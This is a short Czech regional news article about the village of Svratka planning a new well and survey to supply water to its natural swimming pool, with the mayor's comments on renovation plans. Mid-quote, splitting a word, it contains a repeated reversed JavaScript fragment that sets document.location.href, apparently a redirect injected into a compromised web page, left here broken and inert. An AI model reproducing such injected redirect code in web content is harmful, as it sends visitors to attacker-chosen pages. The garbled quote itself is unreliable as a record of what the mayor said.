Rainbow page separator

Ve Svratce se snaží zajistit dostatek vody pro koupaliště

Sobota, 23. března 2019

Svratka / Objednat hydrogeologický průzkum, na základě kterého by byl v areálu koupaliště proveden jímací vrt, se rozhodli ve Svratce. Důvodem je zajištění dostatečného množství vody v letní sezoně, neboť v loňském horkém létě byly bazény zásobované vodou přitékající z pramene v obecním lese prázdné.
„V současné době probíhá jednání s firmou Envirex na spolupráci a smluvním dodání potřebných služeb a zemních prací,“ informoval starosta Svratky František Mládek.
Svratecké přírodní koupaliště bylo v minulých letech doplněno zrekonstruovaným bufetem i novým sociálním zařízením a výhledově se počítá s jeho další obnovou. „Máme nějaké plány, ale samozřejmě tím nejhlavnějším jsou nemalé finanční náklady na celkovou rekonstrukci koupaliště včetně nového zdroje vody a její úpravy. S tím pak úzce souvisí náklady na provoz koupaliště včetně plavčíka a podobně. Přes[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bychom se rádi pokusili postupně zrekonstruovat celý areál, tedy bazény se zázemím i nohejbalové a volejbalové hřiště,“ upřesnil starosta.